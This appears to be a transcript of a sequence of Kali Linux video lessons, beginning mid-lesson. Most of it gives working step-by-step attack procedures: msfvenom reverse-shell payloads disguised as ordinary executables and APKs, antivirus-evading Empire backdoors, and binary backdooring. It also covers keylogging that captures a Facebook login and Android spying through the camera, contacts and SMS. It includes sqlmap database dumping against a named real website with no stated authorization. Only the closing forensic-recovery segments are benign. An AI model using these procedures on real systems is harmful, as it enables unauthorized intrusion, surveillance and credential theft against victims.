_TCP designates the payload we want to embed. Lport designates the port we want to listen on. -x designates the template we want to use and the path to it. -e x86 shikata ga_nai designates the encoder we want to use. -i200 represents the number of iteration. -f exe designates we want to create an executable. Chess.exe designates the name of the file created. When the victim clicks on the chess.exe file, the Meterpreter payload will be activated and will look to make connection back to your system, that is lhost. For connection to succeed, you will need to open the multi-handler in Metasploit to receive the connection. So that's it in this video on MSF Venom. Thank you for watching this video. Welcome. In this video, we are going to learn backdoor factory exploitation tools in Linux. The goal of BDF is patch executable binaries with user-desired shell code and continue normal execution of pre-patched state, supporting Windows PE x32 or x64 and Linux ELF x32 or x64. Some executables have built-in protections. As such, this will not work on all binaries. It is advisable that you test target binaries before deploying them to the clients or using them in exercises. Let's open up terminal, type backdoor-factory, patch Windows 32 or 64 binaries with the shell code. Basic usage of backdoor factory tool: backdoor.py options, -h for help, -f for file to backdoor, -s shell, the shell payload that are available for use, -H for host, the host IP of C2 for reverse connections, and so on. Let's specify the binary to backdoor, -f user share windows -binaries blink.exe, the connect -back port, set the connect back IP
that is -H192.168.1.202, the connect back port, that is -P444, and shell to use -S reverse _ shell _ TCP. Here you can see that there is no shell available in Win Intel PE32S. Let's try with cave _ miner _ inline, copied it and paste here. Looking for caves that will fit in the minimum shell length 137, caves can be used to inject code. Now let's select the second option as .text. The file is existed in backdoor directory. So that's it in this video on backdoor factory exploitation tool in Linux. Thank you for watching this video. Welcome, in this video we'll learn implementing browser auto PWN in Linux. Browser auto PWN is an auxiliary module provided by Metasploit that allows you to automate an attack on a victim machine simply when they access a web page. Browser auto PWN performs a fingerprint of the client before it attacks, meaning that it will not try a Mozilla Firefox exploit against an Internet Explorer 7 browser. Based upon its determination of browser, it decides which exploit is the best to deploy. A connection to the internet or internal network is required to complete this recipe. We are trying to hack a target. We want to know as much as possible about the target through reconnaissance. Then and only then we can choose an appropriate exploit. We should know the operating system, the application, the browser, the version of Java and Flash, etc. It's tedious but necessary work. Using a Java exploit when a Flash exploit is called won't simply work and might land you behind bars. The beauty of auto PWN is that it relieves you of some of the hard work of reconnaissance. Auto PWN will first try to fingerprint the victim's browser, then throw at it whatever exploit it thinks might work. It makes life quite simple. The downside of auto PWN is that it is very noisy and can lead to either detection by the target or crashing the browser, which happens often. Let's open the terminal and start Metasploit. Type msf console. Use auto PWN. To get started with any exploit, generally we start with the use command, that is auto PWN module is located at auxiliary server browser _ auto PWN. Type use auxiliary server browser _ auto PWN. This will load the module. Then to get more information on this module, type info. You can see that this provides us with all the information we need to get started, including each of the options and a brief description of the module. Show and set option. We need to ask it to show us the option. Type show options. You can see the options we have, that is lhost, rvhost, srv port, ssl, sscrt, URI path. The lhost is a local host or Kali attack system. Mine is at 192.168.1.1.106. So set lhost 192.168.1.106. Now we need to create URI path. This is the URL that we want to exploit to be located at our malicious server. We can call it anything we want, or we could leave it blank and Metasploit will set it to a default string. We are trying to entice our victim to click on this link, and let's try to make it inviting and use the name of our hacker training site, Hacking Tute. So type set URI path Hacking Tute. Finally, let's type exploit. This will start auto PWN module. It starts numerous servers and then loads the exploits that may work against the browser. Each one represents a different possible vulnerability in our browser. Be patient as this takes a while. Here we can see that link is generated. Let's
copy it up. If you use Windows 7 system with Internet Explorer 9, you will get this warning from Internet Explorer. Here I am using Google Chrome. Paste it in URL bar. You can see that no response. Let's go back to Kali. You can see that handling hacking tool session ID equals to so and so, and JavaScript report Windows 7 undefined responding with 6 exploits. So that's it in this video on implementing browser auto PWN in Kali Linux. Thank you for watching this video. Welcome. In this video we will see Cybersecurity in Kali Linux. So basically, what is Cybersecurity? Cybersecurity is a command line search tool for exploit database that also allows you to take a copy of exploit database with you everywhere you go. Cybersecurity gives you the power to perform detailed offline searches through your locally checked out copy of the repository. This capability is particularly useful for security assessments on segregated or air-gapped networks without internet access. Many exploits contain links to binary files that are not included in standard repository but can be found in our exploit database binary repository instead. If you anticipate you will be without internet access on an assessment, ensure you check out both repositories for the most complete set of data. So let's do some practical on Cybersecurity in Kali Linux. Open up a terminal in Kali Linux and type Cybersecurity -h. By using -h, you can see all the features and options which are available to you. That is help option. Here you can see the notes. You can use any number of search terms. Search terms are not case sensitive. Use -t to exclude files path to filter search results, and so on. Next, type Cybersecurity -t Oracle Windows. Here you can see the exploit title. By default, Cybersecurity will check both the title of exploit as well as the path depending on the search criteria. This may bring up false positives. Searches can be restricted to titles by using the -t option. And next, type search exploit WordPress mail list. By default, Cybersecurity highlights the search terms in the result when they are displayed to the user. This works by inserting invisible character into the output before and after the color changes. Now if we were to pipe the output and try to match a phrase of both highlighted and non-highlighted text in the output, it would not be successful. Then next, type Cybersecurity -39446. So now that we have found the exploit we are looking for, there are various ways to access it quickly. And now type Cybersecurity -p 39446. By using -p, we are able to get some more information about the exploit. And next, copy the complete path to the exploit onto the clipboard and paste it here. We can see that too many arguments are passed. So that's it in this video on Cybersecurity in Kali Linux. Thank you for watching this video. Welcome. In this video we are going to learn comics package in Kali Linux. Comics stand for Command Injection Exploiter. It has a simple environment. It can be used from web developers, penetration testers, or even security researchers to test web application with the view to find bugs, errors, or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Comics is written in Python programming language. Let's do some practical on comics. Let's open up terminal and type comics -h. Here you can see that the options are displayed here. These options relate to general matters, that is -v, verbose level, --version, show version number and exit, --output, directory is equals to output, set custom output directory path,
-s session file, load session from a stored file, and so on. Target. These options has to be provided to define the target URL. That is -u for target URL, reload the target URL after command execution, -l that is log file, pass target from HTTP proxy log file, -m bulk file, scan multiple targets given in a textual file, and so on. Direction. These options can be used to customize the detection phase, level of test to perform, skip the methodic calculation during detection phase, skipped empty, skip testing the parameter with empty value, and at the end miscellaneous. That is dependencies, check for third-party dependencies, skip WAF, skipped heuristic detection of WAF, IPS, IDS protection, and so on. Let's open up bbox victim machine. You can see that the IP address is 192.168 and so on. Let's copy it up, go back to our terminal and type comics -URL and the URL we had copied, that is 192.168 so and so on, bwap htmli current url.php. Checking connection to the target URL, you can see that there is no parameter in URL. We get response as try to increase the level to type. Why? This too is check vulnerability with different techniques. We can see that testing with classic command injection techniques, dynamic code evaluation techniques, time-based command injection, file-based command injection, and so on. So that's it in this video on comics package in Kali Linux. Thank you for watching this video. Welcome. In this video we will see payloads built into Metasploit. Metasploit is an exploitation framework that every hacker should be knowledgeable of and skilled at. It is one of the most favorite hacking tools available. Metasploit enables us to use pre-written exploit against known vulnerabilities in operating systems. These payloads are what enable us to connect to the victim system and use it as our own after we have exploited a vulnerability in its system. Metasploit has many types of payloads we can leave on the target system. We are most familiar with the generic or shell or reverse TCP and the Windows Meterpreter reverse TCP payload. Now we will look at such things as how the payload work, how Metasploit categorizes the payloads, and what type of payloads are. I hope this understanding will help you to better choose the appropriate payload for your hack. Open up the Kali Linux and open Metasploit. When we open Metasploit console in Linux, we immediately see that Metasploit lists a number of exploit auxiliary modules, post-exploitation modules, payload modules, encoders, and many more. Type MSF console. We can notice that there are 335 payloads in the current version of Metasploit. This is a huge number of payloads that can be used for multiple situations. Type MSF show payloads. Here you can see that Metasploit lists all 335 payloads. Let's see now types of payload. Among these 335 payloads in Metasploit, there are 8 types of payloads. First one is inline. These payloads are single packaged of exploit and payload. They are inherently more stable, but because of their size, they can't always be used in small vulnerable memory areas. Staged. These payloads essentially are able to fit into very small spaces and create a foothold on the system and then pull rest of the payload. Meterpreter is the all-powerful payload that we most often want on a victim system. It works by .dll injection and resides entirely in memory, leaving no trace of its existence on the hard drive or file system. It has a number of specific commands and scripts developed for it, enabling us to largely work our will on the victim system. Passive X. This payload is for use when firewall rules restrict outbound traffic. In essence, it uses ActiveX through Internet Explorer to hide its outbound traffic and evade the firewall by using HTTP requests
and responds just as any browser would. NONX. In some GPUs, there is a built-in security feature called DEP, that is Data Execution Prevention. In Windows, it is referred to as No Execute or NX. The idea behind this security feature is to keep from data making its way to the CPU and being executed. The NONX payloads are designed to evade this safety feature of modern CPUs. ORD. This type of payload work on nearly all Windows operating systems. These are extremely small but somewhat unstable. They are dependent upon loading a .dll file, that is dynamic link library, into the exploited process. IPv6. These payloads, as their implies, are designed to work on IPv6 networks. Reflective DLL injection. These payloads module are injected directly into the target process while it is running in memory, thereby never writing anything to the hard drive and leaving little or no evidence behind. Let's see payload modules. Type CD, that is change directory, to user, share, Metasploit framework, modules, payloads. After changing directory, type ls-l. You can see that Metasploit categorizes its payload into 3 different types. The 8 types above are consolidated into these 3 directories in Metasploit. Now let's see in detail 3 payload modules. Staged. Staged payloads use tiny stagers to fit into small exploitation spaces. In other words, if the victim system exploitation buffer or the memory area is very small and only allows a small amount of code to be executed, first a small stager is placed in the memory area. The stager then pulls the rest of the payload after this foothold is made on victim system. These larger staged payloads include such complex payload as Meterpreter and VNC injection, both of which include large and complex code. Generally, a staged payload will split the name of the payload between a /, such as in the payload Windows shell TCP_bind. The TCP_bind is a stager and shell is a staged. Stagers are the small payloads whose only job is to fit into small memory area and then pull the larger staged payload along. They kind of plant the flag on the victim and enable the larger payload to be loaded. Singles, often referred to as inline payload. Single are self-contained units that do not require a stager. They are generally more stable and preferred, but many times the code is too large for the vulnerable memory area on victim system. Let's now take a look inside that single directory. Let's type cd singles ls-l. We can see singles are broken down by vulnerable platform. If you want to see the singles available for the Windows platform, type cd window, type ls-l. Inside this directory, we can see all single payloads available for Windows, that is shell reverse TCP. So you can see at desert.rb download executable.rb, I think RB means Ruby Rails, shell hidden bind, shell reverse TCP, speak pwned. So this way we can see all single payloads available for Windows. Payloads are key part of Metasploit infrastructure and provide us with the access once the exploit has been completed. The better we understand them, the better we will be as a hacker. So that's all in this video in Metasploit for aspiring hackers. Thank you for watching this video. Welcome, in this video we are going to learn shell noob exploitation tool in Linux. Writing shell code has always been super fun, but some parts are extremely boring and error prone. Focus only on the fun part and use shell noob. Features: convert shell code between different formats and sources.
Formats currently supported is M, bin, hex, object, exe, C, Python, Ruby Rails, Pretty, SafeASM, Complete Text, Shellstorm, all details in Formats description section. Interactive ASM to OP code conversion mode. This is useful when you cannot use specific bytes in the shell code and you want to figure out if a specific assembly instruction will cause problems. Support for both ATT and Intel syntax. Check the -Intel switch. Support for 32 and 64-bit machine. Resolves system call numbers, constant and error numbers. Portable and easily deployable. In place development, you run shell node directly on the target architecture. Built-in support for Linux x86 and 64, ARM, FreeBSD, prepend breakpoint option, read from std in, write to std out support. User cheap debugging, use shell noob as a Python module in your script. Verbose mode shows the low-level steps of the conversion. Extra plugins. Open up terminal, type git clone https github.com/shellnoob.git. Here cloning into shell noob. Cloning is done. Type ls to view all the files and directories. Here we can see that shell noob directory. Let's change directory to shell noob. Type cd space shell noob. Type ls. Here you can see that executed Python file shellcode.py and test.py. Let's install shell noob. Python shellnoob.py space -- install. Here you can see that installation is success. Type snoob space -h. Here you can see that basic usage of shell noob tool. Snoob --input, input file path to output, output file path, and so on. Let's start in interactive mode, that is -i, in ASM to opcode mode, that is -20-asm. Type python shellnoob.py -i-to-asm. Here we see that interactive mode for shell noob tool. So that's it in this video on shell noob exploitation tool in Linux. Thank you for watching this video. Welcome. In this video we will learn about various exploitation tools offered by Kali Linux. In that, first we will see Metasploit. Metasploit is a product of Rapid7 and most of the resources can be found on their web page, that is metasploit.com. It is available in two versions, commercial and free edition. The differences between these two versions is not much, hence in this case we will be using the community version. As an ethical hacker, you will be using Kali distribution, which has Metasploit community version embedded along with other ethical hacking tools which are very comfortable by saving time of installation. However, if you want to install as a separate tool, it is an application that can be installed in the operating system like Linux, Windows, and OS X. Some common commands you will use when interacting with the console are help. This command will allow you to view the help file for the command you are trying to run. Use module. This command allows you to begin configuring the module that you have chosen. Set option module. This command allows you to set the various options for a given module. Exploit. This command launches the exploit module. Run. This command launches a non-exploit module. Search module. This command allows you to search for an individual module. Exit. This command allows you to exit MSF console. So let's begin practical. Open the Metasploit console in Kali. For that, go to Applications, Exploitation Tools. In that, Metasploit. It will take few minutes to start. You'll see the following screen where the version of Metasploit is underlined in red color.
In the console, if you use help or question mark symbol, you'll get lots of help. So just type help. It will show a list with the commands of MSP along with their description. You can choose based on your needs and what you will use. Another important administration command is msf update, that is type msf update, which helps to update Metasploit with the latest vulnerability exploits. After running this command in the console, you will have to wait several minutes until the update is complete. It has a good command called search, which you can use to find what you want. For example, I want to find exploits related to Microsoft, and the command can be msf search name Microsoft type exploit, where search is the command, name is the name of the object that we are looking for, and type is a kind of script we are looking for. Another command is info. It provides the information regarding a module or platform, where it is used, who is the author, vulnerability reference, and the payload restriction that this can have. So that's all in this video. Thank you for watching this video. Welcome. In this video we are going to learn search targets in Metasploit. After we have set up new workspace, we need to scan a host in order to save its detail in the database and attack it automatically with the db-auto-pwn plugin. So let's quickly perform a scan with the Nmap plugin in Metasploit named db-nmap and store its result in the database. Let's open up MSF console in terminal. MSF console is opened here, and now type host. Here you can see that existing host in the database 192.168.0.3, 192.168.0.4, Peter PC, and so on. The db-nmap command stores the result of the port scan directly into the database, along with all relevant information. Type db-nmap 192.168.1.1 24 -vv verbose mode output. Here you can see the discovered ports as 139, 135, 192.168.1.6, host, and so on. Once it complete, re-execute the host command. Here you can see that unknown PC MAC address. Now let's scan the 192.168.1.6. Here you can see that the three ports are opened and victim PC MAC address. Using this technique, now I am going to grab footprinting of victim PC. Type db_nmap-a -t4 192.168.1.6 Here you can see that victim PC footprinting is grabbed, and also you will get PC NetBIOS name and so on. So that's it in this video on search targets in Metasploit. Thank you for watching this video. Welcome. In this video we are going to learn how to hack Windows 7, 8, 8.1, 10 using Shikata GANI encoder in Metasploit. This encoder implements a polymorphic XOR additive feedback encoder. The decoder stub is generated based on dynamic instruction, substitution, and dynamic block ordering. Registers are also selected dynamically. Let's open up terminal and type ifconfig. You can see that 192.168.0.7 IP address. Let's create a backdoor using MSF console. Type msfvenom -h. You can see that basic usage and options. Type msfvenom -p Windows meterpreter reverse TCP lhost equals to 192.168.0.7 lport equals to 444 -f exe -e x64 shikata GANAI space I 10 greater than hack.exe. Type ls. You can see that hack.exe file is generated. Let's send this exe file using social engineering technique. Open up MSF console, load the x64/shikata GNAI module into the MSF console. Type use exploit /x86 shikata GNAI. Let's set the payload as reverse TCP. Type set payload Windows interpreter /reverse_TCP. Type show option. Here you can see that the basic options: lhost, localhost address, lport, local port. Type set lhost 192.168.0.7. Let's execute it. You can see that listening reverse_TCP handler on 192.168.0.7 444. Once victim clicks on hack.exe file, we get Meterpreter session. That's it in this video on hack Windows 7, 8, 8.1, 10 using Shikata GNAI encoder in Metasploit. Thank you for watching this video. Welcome, in this video we are going to learn how to hack any Android device by using a Kali Linux. Let's start set a path where you want to save the .apk file. First open the Kali Linux to create a payload type, that is MSF Venom -p Android Meterpreter reverse_TCP lhost equals to 192.168.0.15 lport equals to 4 times 4 r greater than hacker.apk. It contains host IP and port and name of the application file which you want to create. Here I am giving the name hacker.apk. Here you see the .apk file is created. Install that .apk file into victim cell. As you see, demo is placed on the side of the screen. Now start Metasploit MSF console. Wait, it will take some time. Now type use multi /handler. Then set a payload by typing set space payloads space Android /meterpreter /reverse_TCP. Now set localhost lhost 192.168.0.15, then local port lport space 4444, and to run the Metasploit, type exploit. You see you have got authority access victim mobile. Type system info to know about the device information. You see victim mobile information. Now check the device is rooted or not. For that, check _root. Now to check how many camera having the victim device, type webcam _list. Here in victim mobile has both the camera front and back. To take snap from the back camera, type webcam _snap. Here you see snap taken from back camera of victim's mobile. Now to take snap from camera, webcam _snap space 2. Here you see snap taken from the front camera. Now to see the contacts of victim, dump _contacts. Here you see on desktop file contains a list of contacts. Now to see the message, type dump _SMS. Here you see the file which contains all messages of the victim. Now to see call log, dump _call logs. Here you see the contacts, here you see the message and call log of victim. So that's it in this video on how to hack any Android phone with Kali Linux. Thank you for watching this video. Welcome, in this video we are going to learn privilege escalation Unix helper to know more about your operating system like kernel version. Check if any exploit or vulnerability does exist on Kali Linux. Let us know what is inspector tool. The inspector tool is privilege escalation helper. Easy to be deployed on web server. This tool can list process running with the root check kernel version, check history file, get possible exploit. Inspector is a Python script for help in privilege escalation for Linux environment. After starting the script, search for the kernel version and check if its exploit exists. Load file history bash, zsh, mysql and so on, and load list of programs loaded with root user. So let's start. Open a terminal in Linux and type cd space desktop. Make a path where the file is to be saved. First we need to create inspector's program which is in Python. So type wget https raw gitubusercontent.com granite inspector master inspector.py. As you can see, the file is in the Python. The file is created to start the inspector program. So type python space inspector.py. Here you can see it started. You can see the kernel version of our Linux, and here you can see there is no vulnerability found in my Linux. So that's it in this video on Inspector Secure Tool in Linux. So that's all. Thank you for watching this video. Welcome. In this video we'll do SQL injection with the help of Linux operating system. First boot into Linux operating system and open terminal. In terminal type sqlmap space -h. This command is help. You'll get all the commands to use with sqlmap, like here -u for targeting URL, -g for Google Doc, and these options can be used to specify how to connect to the target URL, that is through cookie or data or proxy or Tor, and injections, detection, and techniques. No need to worry, I will demonstrate you by doing SQL injection. Password, tables, column, schema, dump, these all we will use. So now let's begin. I will type sqlmap -u that is to target the URL. Now I need vulnerable URL, that is biblehistory.com, which you got in introduction of SQL injection. To check vulnerable out, I have to just do this much, and we got the error. Now I will copy the URL and paste it in terminal. After URL space $dbs and hit enter. The SQL map process will start. It is asking, it looks like the backend DBMS is MySQL. Do you want to skip the test payload specific for other DBMS? As it has already identified the backend DBMS as MySQL, so there is no need to check anymore. So I will type Y and hit enter. For the remaining test, do you want to include all tests for MySQL extending provided level 1 and risk 1 values? Yes. It will take time to do SQL injections. I'll just fast forward this video. Get parameter ID is vulnerable. Do you want to keep testing the others? As get parameter ID is already vulnerable, so I don't want to keep testing others, so I'll write N and hit enter. The process is over. The backend DBMS is MySQL, the web application technology is Apache 2.4.23, PHP 5.538, backend DBMS MySQL 5.0. We got 5 available databases: Bible Glossary, Bible History, Information Schema, Keywords, and Kids Dictionary. So now let's browse into any one of those databases. For that I have to just copy the before command till hyphen, that is sqlmap -u the URL till just hyphen, not double hyphen dbs. This much. I'll just copy it and paste it here. Then -d, the database I want, that is Bible_glossary. and table-tables. That's all. I'll hit enter. Inside database Bible glossary, I got 13 tables, that is Bible reference to words. So now to browse inside these tables, from above command, I'll just copy from SQL map to first hyphen of tables. This much. Just copy it and paste it here. After first hyphen, I'll write T, that is tables, and the table name which I want, that is Bible reference, Bible_ref, and double hyphen columns, as I need columns from the tables. So inside table Bible reference, I got 5 columns from book to verse. So now to get values inside this column, I'll just copy and paste the above command till the first hyphen of column, and later I write capital C for column and the column name. You can include how much column you want. You have to just separate the column from a comma, like here, book comma book_ abbreviation. You can include all those columns by just putting comma and so on. Right now I'll just include 2 columns. Then double hyphen dump. This will dump the data inside columns. And I'll hit enter. So these are the values inside those columns. Book and book abbreviations, as you can see here. So basically a website is vulnerable for SQL injections. Then the hacker can get almost all the data stored in the database of the website. You can say if a website is SQL vulnerable, then it is most dangerous. So that's all. In the same way, you can get access to user ID, password, email IDs, almost anything stored in the database of a website which is vulnerable to SQL injections. That's all. Thank you for watching this video.
Welcome. In this video, we are going to learn how to create a backdoor which remains undetected by all antivirus. We are going to use the Empire, which we set it up in the previous video. I have did this video because in my previous course in Metasploit, many new students asked me to teach them how to create a payload which remains undetected by all antivirus. So this is it here. So first go to Empire folder, right click and open internal. Now type ls to see the content of the folder. Here you can see the Empire copy. Then type ./empire. Here you can see it started here. You can see 276 modules are loaded. Now to see how to use, type help. Here you can see commands that are used here. Now copy the listener command and paste here. You can see there is no current listener present. Now type help, copy use listener, then paste internal and type use listener space HTTP. Now type info to see the information. Here we need to set listening port, so here I'm setting 8080. To check, type info. Here you can see listening port is set. Now type execute. Here you can see listener is created. Now back to the terminal by typing back. Here you can see one listener is active. Now type help to see commands. Now we need to create our payload, so type use pager windows /launcher_bat. Here we are creating bat file.
So next type info to see the information. Now type set listener HTTP. Now we need to set the output file where our payload is to be saved. Here I'm giving path on variable www.html backdoor.bat. Next type execute to create a payload file. So I'm saving in this location, that is variable www.html backdoor.bat, because I'm going to transfer this file to my Windows machine using Apache localhost. Now we need to send this bat file to victim machine. So as I said, I will use localhost to send this bat file. If you want, you can directly copy paste, as many of those students faced a lot of problem depending on their system configuration to transfer file from this virtual machine to the mother Windows system which they were using. So in this video I am showing through localhost. So open a new terminal and type service apache 2 start. Now our local server is started. Here I am using my Windows machine as target. So open the browser and type 192.168.0.14. That is address of virtual machine which you can get by typing ifconfig. So here is our bat file. Download and run this. Here you can see in the terminal the backdoor is created. Now type agents to see the sessions or backdoor. Now to interact with the victim machine, type interact ID of the agent. Now it's ready. Let's type system info. Here you can see the info of victim machine. Now let's check the file is going to be detected by antivirus or not. As we have created, payload, executed, it's working perfect. Now it's time to check it is detected by antivirus or not. Open the website, that is metadefender.com. Now choose your bat file and click scan. Here you can see it's showing 0 antivirus detected by all the antivirus software which is listed here. You can see the name of antivirus. I'm not saying that this is the only website. There are many other. I just took this website randomly. I don't have any intention to promote this website. So that's how we created backdoor undetected by all antivirus. Thank you for watching this video. Welcome. In this video we are going to learn about how to hack victim PC and operate remotely the victim PC. Or you can say create a payload and listener using social engineering tools. So first of all, if you are confused what is payload and listener, then it's pretty much obvious that you would have not studied Metasploit. So in short, payload is a file which we have to send to the victim which system we want to hack. If that file gets executed in the victim PC, we can control that PC through the listener. So that's why I mentioned to create a payload and listener using social engineering tools. It's going to be a very interesting video because in this video I'm going to hack a Windows system, that is Windows 7 system. After hacking that system remotely using a payload, what I will do is I will take the screenshot picture of that victim PC and I will even search for whatever is typed in that system and I will try to get almost all of the activities happening on the system. So it's very interesting video. So let's begin. First, open a terminal and type SA toolkit to start the tool. Select one social engineering attacks. To receive a listing of possible attack, select the module 4 to create a payload and a listener. Here you can see the list options, what payload we want to generate. I will select Windows Reverse TCP Meterpreter, where Meterpreter is advanced multi-phased payload that operates via DLL injection, or you can see .dll files. Here, reverse TCP means that it is listening on a port that is waiting for the connection to either establish or abort. To select Windows Reverse TCP Meterpreter, I will type 2. Now next we need to enter the listing host or lhost. So to get the IP, open a new terminal and type ifconfig. Here you can see the IP copy and paste in terminal. Now enter the port for listing. Here I'm going to use a default 443. Now type S for listening payload. Now the payload is created. To see the payload file, go to home, select the folder, set. Here you can see payload file. Change the file name to setup. Now copy the payload file and paste on the desktop of your Windows system. Here it's my Windows 7 on which I am using the virtual machine for Linux. So the victim is this Windows 7 system. When the victim clicks on the payload, here you can see in the terminal session 1 is created. Now type session-i1 to start the session. Here you can see attacker can remotely operate victim PC. So let's see, the session 1 is opened. Now let's try our hands. First, I will write help to see what all commands we have to control the victim system. You can see so many commands we have to control it. You can read it all and try to understand it. I'll show you some commands here. I will type the screenshot which I had said before. So the screenshot, it's taking a bit time. You can see the screenshot is saved to user share set in JPEG format. So let me go to that file. I'll open computers and insert that user and insert that share. No back. I will search for set folder. Inside that set. This is the image. Here you can see the image. It is shot on Windows system. It's pretty interesting. So we took the screenshot of victim system. Now let's try keyscan _start. It has started keystroke sniffer. I'll create new document here and open it up here. It will record my keystrokes. So I will try some writing here. I am writing hello. Okay, whatever I'm typing here, hello there. So you can see what it has got. So let's type keyscan _dump. Over here you can see that whatever I typed, first I typed HELLP, then after I corrected to O, then it's there. So it basically captured all my keystrokes. So now in victim PC, I'll open Chrome browser. So again, keyscan start, I will type here. I'll start here keyscan. In Chrome, I will open up Facebook. Here my Facebook has opened. So let me check what it has recorded. I will log out and write some user ID password here on Facebook. So let me again write keyscan dump. Here you can see Raju 12345, whatever I had typed it had showed here, and had opened the Google Chrome that is also mentioned here. So the key scan literally copies or reports each and everything on the victim PC on each activity. So it was pretty much interesting even for me to do it. I hope it was interesting for you also. So that's it in this video on create a payload and listener using social engineering toolkit. Thank you for watching this video. Welcome. In this video we are going to see how to generate a backdoor for Linux system using FatRat. So basically, in spite of using social engineering tool and Metasploit, I'm introducing FatRat just because the FatRat also updates itself with new payloads. If you miss out any payload with Metasploit or social engineering tool, then you can sure catch the latest one on FatRat. I'm not saying that FatRat has always the latest one, I'm just saying that it's better to have information of almost all of the tool related to remote hacking in social engineering. So let's open a terminal and type FatRat. As you can see, the FatRat is opened. Now I will go for option 1, which is create backdoor with MSF Venom. As you can see, the list of payload. So here I'm selecting .elf extension, the payload to create backdoor for Linux. Now next we need to enter listening host address, which means we need to enter our local IP address. Just copy and paste it. Next enter listening port number. Here I'm giving 8080. Now enter the name of your output file. Next select Linux Meterpreter /reverse TCP. You can select any one. As you can see, the payload is generated, saved in FatRat folder. Now listen a reverse connection from the target machine. We need to open Metasploit. So type MSF console. As you can see now, it's open. We need to set the handler. So we'll type use multi /handler. Next, set payload and lhost, lport, the same what we have given while creating the payload, and type run. As you can see, we are ready to listen a reverse connection. Now we need to send this payload to the victim, that is Linux system. As you can see, I have sent the payload to victim machine. Here I moved my backdoor file to victim machine. So to execute it, I will type chmod plus backdoor.elf to make this file executable. Now to run this file, type /backdoor.elf. As you can see in Metasploit terminal, we got Meterpreter. So basically we got the session. So that's how you can hack Linux system remotely. This works in localhost, as I have already demonstrated how to do it on WAN or any device connected to internet. So that's it in this video on generating backdoor for Linux system using FatRat. Thank you for watching this video. Welcome. In this video we are going to learn how to hack any Windows PC by creating a backdoor using MSF payload or MSF Venom. So before I begin, I would like to inform you that I have already created one in-depth course on Metasploit itself only, that is MSF Venom. In this social engineering course also, I have included few of them, but if you want in-depth knowledge from basics and all, it's better you go to my another course that is on Metasploit. Even if you follow whatever I have did in this course step by step, you can execute it and get the result, but you may not understand why I'm using those keywords and what is the meaning behind it. So if you're really interested in knowing the meaning on what I'm doing and all, it's better to take my another course on Metasploit. Anyway, I have covered enough also in this course, so let's begin. Here we are going to create a payload or virus by MSF Venom and send that virus to victim via any medium. When the victim click on that virus, it creates a backdoor on the victim machine. So let's see how it is done. First, we are going to create a payload, so open terminal and type MSF Venom -p. -p stands for payload. So the payload location, Windows x64/Meterpreter reverse TCP. lhost equals to, so I will type my lhost, IP lport that is 444-f-exe-o root desktop shell.exe. Here you can see the payload file is created. Now open Metasploit to start the attack. Type MSF console. Here you can see it started. Now type multi/handler. Now set a payload as we have created. Set payload Windows x64 Meterpreter reverse TCP. Now to see the options, type show options. Here you can see we need to set listening host 192.168.0.11. Now to start the attack, type run. So here I'm taking my own Windows PC as a target machine. So I'm just copying this file to the desktop on the Windows. Let's click on the virus. Here you can see the backdoor is created. Now the attacker on Linux is authorized to access victim PC. So the same thing I had explained using social engineering toolkit before in this course. In this video I am showing you through MSF Venom. I hope you will adopt even this method also, but the result is all same. So that's it in this video on Windows backdoor creating using MSF Venom. Thank you for watching this video.
Welcome. In this video, we will see DD Rescue tool forensic Linux. DD Rescue does copy data from one file or block device to another. You can specify file positions. There are several differences. DD Rescue does not provide character conversions. The command syntax is different. Call DD_rescue --h to get help. DD_rescue does not abort on error on the input file unless you specify a maximum error number. Then DD_rescue will abort when this number is reached. DD_rescue does not truncate the output file unless asked to. You can tell DD_rescue to start from the end of a file and move backward. It uses two block sizes, a large block size and a small block size. In case of error, the size falls back to the small one and is promoted against after a while without errors. Let's open up terminal, type DD_rescue, copy data from one file or block device to another. DD_rescue version 1.8. Basic syntax DD_rescue. Options in file output file. Options DD_rescue tool. -s IPOS start position in input file. -s to OPOS start position in output file. -b softbs block size for copy in the case of errors, and so on. Let's start a position 100 of the input file and write beginning at the position 0 of the destination file. That is, type DD_rescue -s start at position 100 of input file
that is -s100 variable log messages, and write beginning at the position 0 of destination file, that is -s0 tml rescue out. You can see that the errors equals to 0, tool is successfully copied. Let's see in the output file. Let's open up output file. Here you can see that the copied data. So that's it in this video. Thank you for watching this video. Welcome. In this video we are going to learn extUndelete tool. It's forensic tool in Linux. extUndelete is a utility that can recover deleted files from an extension 3 or extension 4 partition. The extension 3 and extension 4 partition file system are the most common default file systems in Linux distributions like Mint, Mageia, or Ubuntu. extUndelete uses information stored in partitions journal to attempt to recover a file that has been deleted from the partition. There is no guarantee that any particular file will be able to be undeleted, so always try to have a good backup system in place, or at least put one in place after recovering your files. Why use extUndelete? extUndelete is a complete program that makes data recovery from an extension 3 or extension 4 partition sample. Most people are able to recover their files by running one command from the terminal. extUndelete was the first program able to restore both the contents and the file name of a deleted file on an extension 4 partition. Extension 3 grep was the first program to use the file system journal to recover data, and much of its code is shared by extUndelete, but extension 3 grep only worked for extension 3 partition and could take hours to start recovering files if the partition were on a large partition. extUndelete, by contrast, starts recovering files immediately after passing the file system's journal, usually within a minute or two after starting the program. X4Magic is a program to recover files that was based on extUndelete and has a slightly different set of features and limitations. extUndelete makes heavy use of X2FS library, which allows it to automatically support many features of extension 3 and extension 4 file systems. How extUndelete works? extUndelete uses some concept and code first shown to be successful by XT3 group program. extUndelete is able to recover the contents of an inode by searching the file system's journal for an old copy of that inode. It then uses that information to determine the file's location within the file system. Then extUndelete reads the corresponding data and copies it to the file in the recovery directory. extUndelete is able to match the inode number of a file to a file name by searching the deleted entries in the directory, which are often left behind after deleting the file if the deleted entry does not exist in the directory in the file system. extUndelete will look for a match in older copies which are still in the journal. Let's open up terminal and type extUndelete -help. You can see that basic syntax extUndelete options device file. extUndelete tool options are version, help, superblock, journal, and so on. Let's see the version of extUndelete tool. Type extUndelete -version. extUndelete version 0.2.4. Now let's read the partition. To read the partition, type extUndelete partition name, that is devdev sda1, and restore, that is -- restore file and the given file name, root important file. Here you can see that it will display some warning messages for undelete any files without further data loss. Let's continue. Type Y. Here we can see that loading file system metadata 304 groups loaded, loading journal descriptors, and so on. That's it in this video on extUndelete tool, which is a forensic tool in Linux. Thank you for watching this video.
